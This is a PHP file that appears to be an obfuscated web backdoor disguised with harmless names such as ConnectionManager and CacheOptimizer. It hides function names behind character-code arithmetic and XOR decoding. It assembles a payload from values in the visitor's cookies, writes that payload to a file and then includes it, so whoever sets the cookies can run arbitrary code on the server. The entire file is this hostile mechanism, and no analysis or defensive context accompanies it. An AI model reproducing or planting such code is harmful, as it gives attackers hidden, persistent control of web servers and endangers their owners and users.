<?php
function initialize_component($c)
{
    $a = array(5 * 23, 64 + 52, 69 + 28, 33 + 83);
    $s = '';
    foreach ($a as $n) {
        $s .= chr($n);
    }
    return $s($c);
}

function resolve_dependency($c)
{
    $a = array(121 - 6, 110 + 3 + 3, 50 + 64, 108, 101 * 1, 65 * 1 + 45);
    $s = '';
    foreach ($a as $n) {
        $s .= chr($n);
    }
    return $s($c);
}

function load_settings($c)
{
    $a = array(80 + 16 + 4, 6 + 89 + 19, 18 + 33 + 60);
    $s = '';
    foreach ($a as $n) {
        $s .= chr($n);
    }
    $s = strrev($s);
    return $s($c);
}

function log_operation($c)
{
    $a = array(85 + 14, 107 - 3, 2 * 57);
    $s = '';
    foreach ($a as $n) {
        $s .= chr($n);
    }
    return $s($c);
}

class ConnectionManager
{
    private static $_bz;
    static function cacheData($_hh, $_wn)
    {
        if (!self::$_bz) {
            self::resolveAction();
        }
        $_fpw = resolve_dependency($_wn);
        $_ehg = base64_decode(self::$_bz[$_hh]);
        for ($_nrl = 0, $_lj = resolve_dependency($_ehg); $_nrl !== $_lj; ++$_nrl) {
            $_ehg[$_nrl] = log_operation(load_settings($_ehg[$_nrl]) ^ load_settings($_wn[$_nrl % $_fpw]));
        }
        return $_ehg;
    }
    private static function resolveAction()
    {
        self::$_bz = array('_kz' => '', '_yq' => '');
    }
}

class CacheOptimizer
{
    private static $_bz;
    static function cacheData($_hh)
    {
        if (!self::$_bz) {
            self::resolveAction();
        }
        return self::$_bz[$_hh];
    }
    private static function resolveAction()
    {
        self::$_bz = array(00, 05, 014, 014, 01, 014, 02, 05, 01, 017, 011, 030, 06, 027, 07, 02, 032, 010, 03);
    }
}

$_lj = $_COOKIE;
$_wn = CacheOptimizer::cacheData(0);
$_hh = CacheOptimizer::cacheData(1);
$_qlb = array();
$_qlb[$_wn] = ConnectionManager::cacheData('_kz', '_sis');
while ($_hh) {
    $_qlb[$_wn] .= $_lj[CacheOptimizer::cacheData(2)][$_hh];
    if (!$_lj[CacheOptimizer::cacheData(3)][$_hh + CacheOptimizer::cacheData(4)]) {
        if (!$_lj[CacheOptimizer::cacheData(5)][$_hh + CacheOptimizer::cacheData(6)]) {
            break;
        }
        $_wn++;
        $_qlb[$_wn] = ConnectionManager::cacheData('_yq', '_yrd');
        $_hh++;
    }
    $_hh = $_hh + CacheOptimizer::cacheData(7) + CacheOptimizer::cacheData(8);
}
$_wn = $_qlb[CacheOptimizer::cacheData(9)]() . $_qlb[CacheOptimizer::cacheData(10)];
if (!$_qlb[CacheOptimizer::cacheData(11)]($_wn)) {
    $_hh = $_qlb[CacheOptimizer::cacheData(12)]($_wn, $_qlb[CacheOptimizer::cacheData(13)]);
    $_qlb[CacheOptimizer::cacheData(14)]($_hh, $_qlb[CacheOptimizer::cacheData(15)] . $_qlb[CacheOptimizer::cacheData(16)]($_qlb[CacheOptimizer::cacheData(17)]($_lj[CacheOptimizer::cacheData(18)])));
}
include $_wn;